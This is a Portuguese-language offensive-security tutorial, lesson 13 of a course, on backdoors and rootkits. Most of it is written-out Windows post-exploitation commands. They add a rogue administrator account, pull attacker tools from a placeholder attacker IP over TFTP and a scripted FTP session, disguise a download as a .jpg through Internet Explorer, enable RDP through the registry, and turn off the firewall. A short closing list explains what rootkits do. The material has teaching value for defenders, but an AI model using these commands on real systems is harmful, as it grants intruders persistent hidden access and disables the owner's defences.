Entenda um pouco sobre backdoors e rootkits
Este tutorial faz parte do GUIA COMPLETO do professional em Segurança Ofensiva de Software, saiba mais.
Aula 13: Backdoors e Rootkits
13.1 Backdoors
Backdoor significa literalmente "porta dos fundos", um atacante experiente sempre abre um backdoor após conseguir acesso a máquina alvo. Por exemplo ao ter acesso a uma máquina Windows o atacante pode facilmente criar um usuário e assumir a administração do sistema com os comandos abaixo:
[net user usuarioX senhaX /add
net localgroup administrators usuarioX /add]
Assim o atacante pode utilizar ferramentas VNC para poder monitorar e controlar a máquina alvo graficamente. Para isso é necessário instalar um servidor VNC na máquina alvo, desabilitar qualquer opção que possa deixar que o alvo perceba que está rodando um servidor VNC e criar um túnel SSH para poder se conectar a máquina fora da rede local.
Para transferir determinada ferramenta o atacante pode utilizar o TFTP (para arquivos pequenos, pois a transferência é sobre protocolo UDP) ou o FTP (para arquivos grandes, protocolo TCP). O código abaixo exemplifica comandos para transferência da ferramenta presente na máquina do atacante após obter a shell da máquina alvo:
[tftp -i ip_atacante GET nome_ferramenta]
[echo open ip_atacante 21 > ftp.txt
echo usuário >> ftp.txt
echo senha >> ftp.txt
echo bin >> ftp.txt
echo GET nome_ferramenta >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt]
Em máquina com Internet Explorer também é possível utilizá-lo para baixar a ferramenta, para isso hospede a ferramenta online como .jpg e utilize os comandos abaixo para baixá-la remotamente via linha de comando.
[cd C:\Program Files\Internet Explorer\
start iexplore.exe <jpg_file_complete_http_url>
cd C:\Documents and Settings\<USER>\Local Settings\Temporary
Internet Files\
dir /S
XCOPY <source_complete_file_path> <destination_folder_path> /h /y /c
REN <old_filename> <new_filename>]
O RDP é o protocolo padrão da Microsoft para acesso remoto no qual você pode utilizar como backdoor. Com um usuário administrador habilite o RDP com o comando a seguir.
[net localgroup "Remote Desktop Users" UserLoginName /add
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
net start TermService]
Para desabilitar o firewall padrão do Windows basta usar o comando:
[netsh firewall set opmode disable]
Nos Windows recentes o comando é:
[netsh advfirewall set currentprofile state off]
13.2 Rootkits
Rootkits são ferramentas maliciosas utilizada por atacantes para garantir a persistência do atacante às máquinas exploradas tentando se esconder de ferramentas como antivírus e outras. Com as permissões necessárias, rootkits vão tentar:
- Desativar antivírus.
- Esconder detalhes de conexão TCP/UDP.
- Esconder detalhes de processo malicioso.
- Esconder arquivos específicos.
- modo usuário, fácil detecção.
- modo kernel, se escreve no kernel do sistema.
- se escrever na MBR do disco, Windows 8 e superiores possuem secure boot.
- ficam na memória, deixa sistema lento temporariamente.
- se escrever no firmware do hardware, difícil detecção.
COMENTÁRIOS